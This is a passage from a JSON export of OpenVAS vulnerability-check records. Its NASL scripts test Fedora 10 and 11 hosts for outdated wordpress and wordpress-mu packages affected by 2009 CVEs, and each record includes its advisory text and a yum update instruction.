http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress\", rpm:\"wordpress~2.8.1~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:38:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8529.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064697", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064697", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8529 (wordpress-mu)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8529.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8529 (wordpress-mu)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update spans MU-versions for the following security releases from upstream:\n\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n\n* Backport of XSS fixes from WordPress 2.8.2\n* Backport of security fixes for admin.php?page= bugs (CVE-2009-2334)\n\nChangeLog:\n\n* Wed Aug 12 2009 Bret McMillan - 2.8.4a-1\n- Update to version 2.8.4a for security fixes\n* Fri Jul 10 2009 Bret McMillan - 2.7-6\n- Patch for CVE-2009-2334\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update wordpress-mu' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8529\";\ntag_summary = \"The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8529.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64697\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-8529 (wordpress-mu)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress-mu\", rpm:\"wordpress-mu~2.8.4a~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8529.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64697", "href": "http://plugins.openvas.org/nasl.php?oid=64697", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8529 (wordpress-mu)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8529.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8529 (wordpress-mu)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update spans MU-versions for the following security releases from upstream:\n\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n\n* Backport of XSS fixes from WordPress 2.8.2\n* Backport of security fixes for admin.php?page= bugs (CVE-2009-2334)\n\nChangeLog:\n\n* Wed Aug 12 2009 Bret McMillan - 2.8.4a-1\n- Update to version 2.8.4a for security fixes\n* Fri Jul 10 2009 Bret McMillan - 2.7-6\n- Patch for CVE-2009-2334\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update wordpress-mu' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8529\";\ntag_summary = \"The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8529.\";\n\n\n\nif(description)\n{\n script_id(64697);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-8529 (wordpress-mu)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress-mu\", rpm:\"wordpress-mu~2.8.4a~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7729.", "modified": "2017-07-10T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:64407", "href": "http://plugins.openvas.org/nasl.php?oid=64407", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-7729 (wordpress)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7729.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7729 (wordpress)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ChangeLog:\n\n* Fri Jul 10 2009 Adrian Reber - 2.8.1-1\n- updated to 2.8.1 for security fixes - BZ 510745\n* Mon Jun 22 2009 Adrian Reber - 2.8-1\n- updated to 2.8\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update wordpress' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7729\";\ntag_summary = \"The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7729.\";\n\n\n\nif(description)\n{\n script_id(64407);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 10 FEDORA-2009-7729 (wordpress)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress\", rpm:\"wordpress~2.8.1~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:37:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7701.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:136141256231064404", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064404", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-7701 (wordpress)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7701.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7701 (wordpress)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wordpress is an online publishing / weblog package that makes it very easy,\nalmost trivial, to get information out to people on the web.\n\nChangeLog:\n\n* Fri Jul 10 2009 Adrian Reber - 2.8.1-1\n- updated to 2.8.1 for security fixes - BZ 510745\n* Mon Jun 22 2009 Adrian Reber - 2.8-1\n- updated to 2.8\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update wordpress' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7701\";\ntag_summary = \"The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7701.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64404\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-7701 (wordpress)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress\", rpm:\"wordpress~2.8.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7701.", "modified": "2017-07-10T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:64404", "href": "http://plugins.openvas.org/nasl.php?oid=64404", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-7701 (wordpress)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7701.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7701 (wordpress)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wordpress is an online publishing / weblog package that makes it very easy,\nalmost trivial, to get information out to people on the web.\n\nChangeLog:\n\n* Fri Jul 10 2009 Adrian Reber - 2.8.1-1\n- updated to 2.8.1 for security fixes - BZ 510745\n* Mon Jun 22 2009 Adrian Reber - 2.8-1\n- updated to 2.8\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update wordpress' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7701\";\ntag_summary = \"The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7701.\";\n\n\n\nif(description)\n{\n script_id(64404);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-7701 (wordpress)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress\", rpm:\"wordpress~2.8.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:40:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-1030", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8538.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064699", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064699", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8538 (wordpress-mu)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8538.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8538 (wordpress-mu)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate spans MU-versions for the following security releases from upstream:\n\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n* Backport of XSS fixes from WordPress 2.8.2\n* Backport of security fixes for admin.php?page=bugs (CVE-2009-2334)\n\nChangeLog:\n\n* Wed Aug 12 2009 Bret McMillan - 2.8.4a-1\n- Update to version 2.8.4a for security fixes\n* Fri Jul 10 2009 Bret McMillan - 2.7-6\n- Patch for CVE-2009-2334\n- Update to version 2.7\n- Alter source prep so I can still use upstream's tarball\n- favicon.ico removed from manifest\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update wordpress-mu' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8538\";\ntag_summary = \"The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8538.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64699\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-1030\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 10 FEDORA-2009-8538 (wordpress-mu)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress-mu\", rpm:\"wordpress-mu~2.8.4a~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:57:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-1030", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8538.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64699", "href": "http://plugins.openvas.org/nasl.php?oid=64699", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8538 (wordpress-mu)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8538.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8538 (wordpress-mu)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate spans MU-versions for the following security releases from upstream:\n\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n* Backport of XSS fixes from WordPress 2.8.2\n* Backport of security fixes for admin.php?page=bugs (CVE-2009-2334)\n\nChangeLog:\n\n* Wed Aug 12 2009 Bret McMillan - 2.8.4a-1\n- Update to version 2.8.4a for security fixes\n* Fri Jul 10 2009 Bret McMillan - 2.7-6\n- Patch for CVE-2009-2334\n- Update to version 2.7\n- Alter source prep so I can still use upstream's tarball\n- favicon.ico removed from manifest\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update wordpress-mu' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8538\";\ntag_summary = \"The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8538.\";\n\n\n\nif(description)\n{\n script_id(64699);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-1030\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 10 FEDORA-2009-8538 (wordpress-mu)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
